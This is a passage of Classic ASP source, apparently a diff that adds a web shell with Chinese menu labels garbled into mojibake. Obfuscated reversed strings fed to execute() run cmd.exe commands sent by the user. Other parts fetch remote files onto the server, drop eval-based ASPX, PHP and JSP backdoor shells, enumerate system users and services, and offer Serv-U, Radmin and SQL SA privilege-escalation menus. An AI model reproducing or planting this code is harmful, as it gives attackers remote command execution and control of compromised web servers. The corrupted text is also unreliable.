+j cdx&"<a href='?Action=UpFile' target='FileFrame'>"&cxd&" �ϴ�--�ļ�"&ef
+j cdx&"<a href='?Action=Cmd1Shell' target='FileFrame'>"&cxd&" ִ��---CMD"&ef
+j cdx&"<a href='?Action=cmdx' target='FileFrame'>"&cxd&" ִ��--CMD2"&ef
+j cdx&"<a href='?Action=ScanDriveForm' target='FileFrame'>"&cxd&" ����--Ȩ��"&ef
+j cdx&"<a href='?Action=php' target='FileFrame'>"&cxd&" �ű�--̽��"&ef
+j cdx&"<a href='?Action=PageAddToMdb' target='FileFrame'>"&cxd&" ���������"&ef
+j cdx&"<a href='?Action=upload' target='FileFrame'>"&cxd&" ����--�ļ�"&ef&"</table><hr></td></tr>"
+End If
+j"</tr><tr><td height=4></td></tr><tr><td onClick=""MM_show('menuc')""><input onMouseOver=""this.style.cursor='hand1'"" type=button value='Information'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menuc style=""display='none'"">"
+j cdx&"<a href='?Action=Course' target='FileFrame'>"&cxd&" �û�__�˺�"&ef
+j cdx&"<a href='?Action=getTerminalInfo' target='FileFrame'>"&cxd&" �˿�__����"&ef
+j cdx&"<a href='?Action=Alexa' target='FileFrame'>"&cxd&" ���__֧��"&ef
+j cdx&"<a href='?Action=Servu' target='FileFrame'>"&cxd&" Servu-��Ȩ"&ef
+j cdx&"<a href='?Action=suftp' target='FileFrame'>"&cxd&" Su---FTP��"&ef
+j cdx&"<a href='?Action=MMD' target='FileFrame'>"&cxd&" SQL-----SA"&ef
+j cdx&"<a href='http://odayexp.com/h4cker/sql/' target='FileFrame'>"&cxd&" SQL---����"&ef
+j cdx&"<a href='?Action=radmin' target='FileFrame'>"&cxd&" Radmin��Ȩ"&ef
+j cdx&"<a href='?Action=pcanywhere4' target='FileFrame'>"&cxd&" Pcanywhere"&ef
+j cdx&"<a href='?Action=ScanPort' target='FileFrame'>"&cxd&" �˿�ɨ����"&ef
+j cdx&"<a href='?Action=ReadREG' target='FileFrame'>"&cxd&" ��ȡע���"&ef
+j cdx&"<a href='?Action=TSearch' target='FileFrame'>"&cxd&" ����__�ļ�"&ef&"</tr></table>"
+j"<hr><tr><td><input onMouseOver=""this.style.cursor='hand'"" type=button value='   Special     '></td</tr><tr><td height=4></td></tr><tr><td align=center><table border=0>"
+j cdx&"<a href='?Action=EditPower&PowerPath=\\.\"&OOOO&"' target='FileFrame'>"&cxd&" <font color=red>ɱɱɱɱɱ"&ef
+j cdx&"<a href='?Action=hiddenshell' target='FileFrame'>"&cxd&" <font color=red>���Ӹ�����</font>"&ef
+j cdx&"<a href='http://www.odayexp.com/h4cker/tuoku/' target='FileFrame'>"&cxd&" <font color=red>�����ջ�</font>"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\vti_cnf..\\")&""",""NewFolder"")'>"&cxd&"  <font color=red>������Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=ProFile' target='FileFrame'>"&cxd&" <font color=red>�ļ�--����"&ef
+j"<hr><tr><td><input onMouseOver=""this.style.cursor='hand'"" type=button value=' ��������ѯ '></td</tr><tr><td height=4></td></tr><tr><td align=center><table border=0>"
+j cdx&"<a href='http://www.aizhan.com/siteall/"&str1&"' target='FileFrame'>"&cxd&" �ۺϲ�ѯ"&ef
+j cdx&"<a href='http://www.114best.com/ip/114.aspx?w="&str1&"' target='FileFrame'>"&cxd&" ͬ����ѯ"&ef
+j cdx&"<a href='http://mytool.chinaz.com/baidusort.aspx?host="&str1&"&sortType=0' target='FileFrame'>"&cxd&" Ȩ�ز�ѯ"&ef
+j cdx&"<a href='http://tool.chinaz.com/Tools/Robot.aspx?url="&str1&"&btn=+��+ѯ+' target='blank'>"&cxd&" <font color=red>��Ů��ѯ"&ef
+j cdx&"<a href='?Action=Logout' target='_top'>"&cxd&" <font color=green>�˳�--��½</a></td></tr></hr></table>"
+end function
+function Cmdx()
+execute(shisanfun(")��>retnec/<>aeratxet/<��(j: lladaer.tuodts.))��dmc��(tseuqer&��c/ ��&)��xdmc��(tseuqer(cexe.nhltpircSo j: fi dne�� lladaer.tuodts.))��dmc��(tseuqer&��c/ exe.dmc��(cexe.nhltpircSo j��neht ��exe.dmc��=)��xdmc��(tseuqer fi:txeN emuseR rorrE nO:)�� >72=swor 051=sloc ylnodaer aeratxet<��(j:)�� >mrof/<>'tibmuS'=eulav timbus=epyt tupni<��(j:)�� >rb<>06=ezis 'dmc'=eman txet=epyt tupni<��(j:)�� >rb<>'exe.dmc'=eulav 06=ezis 'xdmc'=eman txet=epyt tupni<��(j:)�� >'tsop'=dohtem mrof<>retnec<��(j��"))
+end function
+
+
+
+Function Course()
+SI="<br><table width='80%' align='center'><tr><td height='20' colspan='3' align='center' id=s><b>ϵͳ�û������</b></td></tr>"
+on error resume next
+for each obj in getObject("WinNT://.")
+err.clear
+if OBJ.StartType="" then
+SI=SI&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td id=d>&nbsp;ϵͳ�û�(��)</td></tr><tr>" 
+end if
+if OBJ.StartType=2 then lx="�Զ�"
+if OBJ.StartType=3 then lx="�ֶ�"
+if OBJ.StartType=4 then lx="����"
+if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
+SI1=SI1&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" id=d colspan=""2"">[��������:"&lx&"]<font>&nbsp;"&obj.path&"</font></td></tr>"
+else
+SI2=SI2&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[��������:"&lx&"]<font color=#3399FF>&nbsp;"&obj.path&"</font></td></tr>"
+end if
+next
+j SI&SI0&SI1&SI2&"</table>"
+End Function
+respnose.Write strBAD&Action
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+
+function downfile(path)
+execute(shisanfun("gnihton = mso tes��esolc.mso��hsulf.esnopser��daer.mso etirwyranib.esnopser���maerts-tetco/noitacilppa�� = epyttnetnoc.esnopser���8-ftu�� = tesrahc.esnopser��ezis.mso ,��htgnel-tnetnoc�� redaehdda.esnopser��)zs,htap(dim & ��=emanelif ;tnemhcatta�� ,��noitisopsid-tnetnoc�� redaehdda.esnopser��1+)��\��,htap(verrtsni=zs��htap elifmorfdaol.mso��1 = epyt.mso��nepo.mso��))0,6(tbo(tcejboetaerc = mso tes��raelc.esnopser��"))
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+execute(shisanfun("noitcnuF dnE����>elbat/<>mrof/<>rt/<>dt/<>'����'=eulav 'timbuS'=eman 'timbus'=epyt tupni< >'52'=ezis  'elif'=epyt 'eliFlacoL'=eman tupni<>'04'=ezis '��&)��exe.dmC\��&)��htaPredloF��(noisseS(htaPeRR&��'=eulav 'htaPoT'=eman tupni<����·����>dt<>rt<>'atad-mrof/trapitlum'=epytcne 'tsoP=2noitcA&eliFpU=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<>'retnec'=ngila '0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<>rb<>rb<��j  ��fI dnE  ��dnE.esnopseR ��)(rrEwohS ����&lruypoc&��� j ��IS j ��lrUkcaB&IS=IS ��gnihton=U teS��gnihton=F teS��fI dnE ��fi dnE  ���>retnec/<�����ɩ�&�崫��&���ϩ�&emaNU&�����>rb<>rb<>rb<>retnec<��=IS ��nehT 0=rebmun.rrE fI ��emaNU sAevaS.F ��eslE  ��txen emuser rorre no���!���ϩ�&����ĸ�һ��&����ѡ��·��&��ȫ��ĩ�&�崫�����&������>rb<��=IS  ��neht 0=eziSeliF.F rO ���=emaNU fI ��)��htaPoT��(mrof.U=emaNU��)��eliFlacoL��(AU.U=F teS�� CPU wen=U teS��nehT ��tsoP��=)��2noitcA��(tseuqeR fI ��)(eliFpU noitcnuF"))
+function cmd1shell()
+execute(shisanfun("is j���>mrof/<>aeratxet/<��&)31(rhc&is=is��fi dne��fi dne��aaa&is=is��)eurt ,elifpmetzs(elifeteled.osf llac��esolc.xclelifo��)lladaer.xclelifo(edocnelmth.revres=aaa��)0 ,eslaf ,1 ,elifpmetzs( eliftxetnepo.sf = xclelifo tes��)��tcejbometsyselif.gnitpircs��(tcejboetaerc = sf tes��)eurt ,0 ,elifpmetzs & �� > �� & dmcfed & �� c/ ��&htapllehs( nur.sw llac��)��txt.dmc��(htappam.revres = elifpmetzs��)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��txen emuser rorre no��esle��aaa&is=is��lladaer.tuodts.dd=aaa��)dmcfed&�� c/ ��&htapllehs(cexe.mc=dd tes��))0,1(tbo(tcejboetaerc=mc tes��neht ��sey��=)��tpircsw��(mrof.tseuqer fi��neht ���><)��dmc��(mrof.tseuqer fi���>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elyts aeratxet<>'��ִ'=eulav 'timbus'=epyt tupni< >'��&dmcfed&��'=eulav '%29:htdiw'=elyts 'dmc'=eman tupni<llehs.tpircsw>��&dekcehc&��'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<>'%07:htdiw'=elyts '��&htapllehs&��'=eulav 'ps'=eman tupni<����·llehs>'tsop'=dohtem mrof<��=is��)��dmc��(tseuqer = dmcfed neht ���><)��dmc��(tseuqer fi����=dekcehc neht ��sey��><)��tpircsw��(tseuqer fi���exe.dmc�� = htapllehs neht ���=htapllehs fi��)��htapllehs��(noisses=htapllehs��)��ps��(tseuqer = )��htapllehs��(noisses neht ���><)��ps��(tseuqer fi���dekcehc ��=dekcehc��"))
+end function
+Function upload()
+j"<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>" 
+j"��ʱ�رմ˹���"
+j" ���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���<hr/>"
+j"<form method=post>"
+j"<select onChange='this.form.theUrl.value=this.value;'>"
+j"<option value=''>��������</option>"
+j"<input name=theUrl value='http://' size=80><input type=submit value=' ���� '><br/>"
+j"<input name=thePath value='" & HtmlEncode(Server.MapPath(".")) & "\' size=80>"
+j"<input type=checkbox name=overWrite value=2>���ڸ��ǡ�"
+j"<input type=hidden value=downFromUrl name=theAct>"
+j"</form>"
+j"<hr/>"
+If isDebugMode = False Then
+On Error Resume Next
+End If:Dim Http, theUrl, thePath, stream, fileName, overWrite
+theUrl = Request("theUrl")
+thePath = Request("thePath")
+overWrite = Request("overWrite")
+Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http = Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite <> 2 Then:overWrite = 1:End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState <> 4 Then 
+End If
+With stream
+.Type = 1
+.Mode = 3
+.Open
+.Write Http.ResponseBody
+.Position = 0
+.SaveToFile thePath, overWrite
+If Err.Number = 3004 Then
+Err.Clear
+fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If fileName = "" Then
+fileName = "index.htm.txt"
+End If
+thePath = thePath & "\" & fileName
+.SaveToFile thePath, overWrite
+j"error,��������Ϊ�ļ��Ѵ��ڣ������ع��̺͵�ַ�г� �ִ��� �� �ļ������� ��Ϊ���ֽڣ���"
+End If
+.Close
+End With
+chkErr(Err)
+Set Http = Nothing
+Set Stream = Nothing
+If isDebugMode = False Then
+On Error Resume Next
+End If
+If Request("ice")="fso" Then
+response.Redirect str1&"test.aspx"
+elseif Request("ice")="fsos" then
+response.Redirect str1&"test.php"
+elseif Request("ice")="jztxt" then
+response.Redirect "http://"&serveru&"/global.asa"
+elseif Request("ice")="killdoor" then
+response.Redirect str1&"killdoor.asp"
+end if
+End Function:Function TSearch():dim st:st=timer():RW="<br><table width='600' bgcolor='' border='0' cellspacing='1' cellpadding='0' align='center'><form method='post'>"
+  RW=RW & "<tr><td height='20' align='center' bgcolor=''>��������</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;·&nbsp;&nbsp;����<input name='SFpath' value='" & WWWRoot & "' style='width:390'>&nbsp;ע:��·��ʹ��"",""������.</td></tr>"
+  RW=RW & "<tr><td bgcolor=''>&nbsp;�ļ�����<input name='Sfk' style='width:200'>&nbsp;<input type='submit' value='����' class='submit'>&nbsp;[����Ҳ��]</td></tr>"  
+  RW=RW & "</form></table>"
+  j RW : RW=""
+  if Request.Form("Sfk")<>"" then
+  Set newsearch=new SearchFile
+  newsearch.Folders=trim(Request.Form("SFpath"))
+  newsearch.keyword=trim(Request.Form("Sfk"))
+  newsearch.Search
+  Set newsearch=Nothing
+  j"�M�r��"&(timer()-st)*1000&"����<hr>"
+  end if
+End Function 
+
+Class SearchFile
+ dim Folders,keyword,objFso,Counter
+ Private Sub Class_Initialize
+  Set objFso=Server.CreateObject(ObT(0,0))
+  Counter=0
+ End Sub
+ Private Sub Class_Terminate
+    Set objFso=Nothing
+ End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+ Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+ Private Function ColorOn(FileName)
+   dim objReg
+   Set objReg=new RegExp
+   objReg.Pattern=CreatePattern(keyword)
+   objReg.IgnoreCase=True
+   objReg.Global=True
+   retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1))
+   if retVal then
+     OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"<font color=''>$1</font>")
+     OutPut="<table align='center' width='600'>&nbsp;" & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut
+  j OutPut
+  Response.flush
+  ColorOn=1
+   else
+     ColorOn=0
+   end if
+   Set objReg=Nothing
+ End Function
+End Class
+
+
+execute(shisanfun("��noitcnuf dnE:fI dnE:��)'����¼Ŀ��վ�ڲ�����'(trela���=kcilcno ���###��=lrUnepo:eslE:��knalb_���=tegrat ����&lrUeht&��/��=lrUnepo:fI dnE:)2 ,lrUeht(diM = lrUeht:nehT ��/�� = )1 ,lrUeht(tfeL fI:)��/�� ,��\�� ,lrUeht(ecalpeR = lrUeht:)1 + )htaPeht(neL ,htaPesu(diM = lrUeht:nehT )htaPeht(esaCL = )))htaPeht(neL ,htaPesu(tfeL(esaCL fI:)��/��(htaPpaM.revreS = htaPeht:htaPeht ,lrUeht miD:)htaPesu(lrUnepo noitcnuf:noitcnuF dnE:fi dne:��B�� & eziSeht = eziSehTteg: nehT 4201< eziSeht dnA 0 => eziSeht fI:fi dne:��K�� & 001 / )001 * )4201 / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201( < eziSeht dnA 4201 => eziSeht fI:fi dne:��M�� & 001 / )001 * ))4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( < eziSeht dnA )4201 * 4201( => eziSeht fI:fi dne:��G�� & 001 / )001 * ))4201 * 4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( => eziSeht fI:)eziSeht(eziSehTteg noitcnuF:noitcnuF dnE:fi dne:��>���'��&htaPrewoP&��=htaPrewoP&2=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<����δ>26FF26#=roloc tnof<�� = setubirttAteg:esle:��>���'��&htaPrewoP&��=htaPrewoP&1=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<������>der=roloc tnof<�� = setubirttAteg: neht 0=KOtidE fi:)��\\��,��\��,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => eulaVtni fI:fI dnE:0=KOtidE:2 - eulaVtni = eulaVtni:nehT 2 => eulaVtni fI:fI dnE:0=KOtidE:4 - eulaVtni = eulaVtni:nehT 4 => eulaVtni fI:fI dnE:8 - eulaVtni = eulaVtni:nehT 8 => eulaVtni fI:fI dnE:61 - eulaVtni = eulaVtni:nehT 61 => eulaVtni fI:fI dnE:23 - eulaVtni = eulaVtni:nehT 23 => eulaVtni fI:fI dnE:46 - eulaVtni = eulaVtni:nehT 46 => eulaVtni fI:fI dnE:821 - eulaVtni = eulaVtni:nehT 821 => eulaVtni fI:1=KOtidE:KOtidE miD:)htaPrewoP,eulaVtni(setubirttAteg noitcnuF:noitcnuF dnE:eltiTrts = eltiTyMteg:)htaPrewoP,setubirttA.enOeht(setubirttAteg & �� :̬״��Ȩǰ��>rb<�� & eltiTrts = eltiTrts:desseccAtsaLetaD.enOeht & �� :�ʷú���>rb<�� & eltiTrts = eltiTrts:deifidoMtsaLetaD.enOeht & �� :���޺���>rb<�� & eltiTrts = eltiTrts: detaerCetaD.enOeht & �� :��ʱ����>rb<�� & eltiTrts = eltiTrts: )eziS.enOeht(eziSehTteg & �� :С��>rb<�� & eltiTrts = eltiTrts: ��� & htaP.enOeht & �� :��·>rb<�� & eltiTrts = eltiTrts:eltiTrts miD:)htaPrewoP,enOeht(eltiTyMteg noitcnuF:bus dne:gnihtoN = eliFeht teS:)htaPrewoP,eliFeht(eltiTyMteg j:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)���,�����,htaPrewoP(ecalper=htaPrewoP:)htaPrewoP(rewoPtidE bus:bus dne:gnihtoN = eliFeht teS:fi dne:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����ɶ�������'(trela>'tpircsavaj'=egaugnal tpircs<�� j:7=setubirttA.eliFeht:esle:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����⹦���Ѽ���'(trela>'tpircsavaj'=egaugnal tpircs<�� j:23=setubirttA.eliFeht:neht 1=epyTevaS fi:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)epyTevaS,htaPrewoP(rewoPevaS bus��"))
+
+Function ScReWr(folder)
+execute(shisanfun("rtSrWeR = rWeRcS��gnihtoN = OSF teS��gnihtoN = redloFtseT teS��gnihtoN = tsiLeliFtseT teS��fi dnE��fi dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� ��>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��eslE��fI dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��raelC.rre��nehT rre fI��txeN��tsiLeliFtseT ni A hcaE roF���pmt.�� & )won(dnoceS & )won(etuniM & )won(ruoH & )won(yaD & ��pmet\�� = emaneliFdnR��sredloFbuS.redloFtseT = tsiLeliFtseT teS��)redlof(redloFteG.OSF = redloFtseT teS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS = OSF teS��emaneliFdnR,rtSrWeR,tsiLeliFtseT,redloFtseT,OSF miD�� txen emuser rorre no"))
+End Function
+
+function php()
+execute(shisanfun("��>rb<>mrof/<>sosf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&php.tset\��&htaptoor&��=htaPeht&��&tphp&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>rb<>mrof/<>osf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&xpsa.tset\��&htaptoor&��=htaPeht&��&txpsa&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>retnec<>'02'=thgieh dt<>rt<>retnec/<>a/<>tnof/<>b/<)!�����Բ��ɾ(>b<>der=roloc 5=ezis tnof<>'ledjpa=noitcA?'=ferh a<>p<>tnof/<>retnec<>rb<>p<>rb<>rb<>p<>rb<>p<>rb<>rb<>retnec/< ;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw xpsa.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw psj.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw php.tset=crs emarfi<>retnec<��j���oo��_��oo tseT xpsa��&)26(rhc&���&)73(rhc&��;))���efasnu���,]���w���[metI.tseuqeR(lave(etirW.esnopseR��&)73(rhc&���&)06(rhc&���&)26(rhc&���&)73(rhc&�� ���eslaf���=tseuqeRetadilav ���tpircsJ���=egaugnaL egaP @%��&)06(rhc&���etirW.))��xpsa.tset��(htappam.revres(eliFtxeTetaerC.osf���oo��_��oo tseT psJ��etirW.))��psj.tset��(htappam.revres(eliFtxeTetaerC.osf���>?)(ofniphp php?<>?'oo��_��oo' ohce PHP?<��etirW.))��php.tset��(htappam.revres(eliFtxeTetaerC.osf��))0,0(tBo(tcejbOetaerC.revreS=osf tes��txeN emuseR rorrE nO��"))
+End function
+
+On Error Resume Next
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function IsIco(ia,ib,ta)
+	If ShowFileIco=true Then
+      IsIco = " <img src='"&IcoPath&ia&"'> "
+	  If ib<>"" Then
+	  IsIco = "<img src='"&IcoPath&ib&"'> "
+	  End If
+	Else
+	  IsIco = "&nbsp;<font face='wingdings' color='#dddddd' size='6'>"&ta&"</font>  "
+	End If
+End Function
+Function FileIco(FName)
+  If ShowFileIco=true Then
+    TypeList =  ".asp.asa.bat.bmp.com.doc.db.dll.exe.gif.htm.html.inc.ini.jpg.js.log.mdb.mid.mp3.png.php.rm.rar.swf.txt.wav.xls.xml.zip.jsp.aspx.;"
+    FileType = lcase(Mid(FName, InstrRev(FName,".")+1))
+    If Instr(TypeList,"."&FileType)>0 then
+      Ico = FileType&".gif"
+    Else
+      Ico = "default.gif"
+    End If
+
+    FileIco = "<img src='"&IcoPath&Ico&"' border='0'> "
+  Else 
+    FileIco="<font face='wingdings' color='#dddddd' size='3'>2</font> "
+  End If
+End Function
+Function Show1File(Path) 
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>" 
+For Each F in FOLD.subfolders
+SI=SI&"<td height=10 width=17% align=center><div style='border:1px solid #383838;padding-bottom:4px'>"
+SI=SI&IsIco("","folder.gif","0")
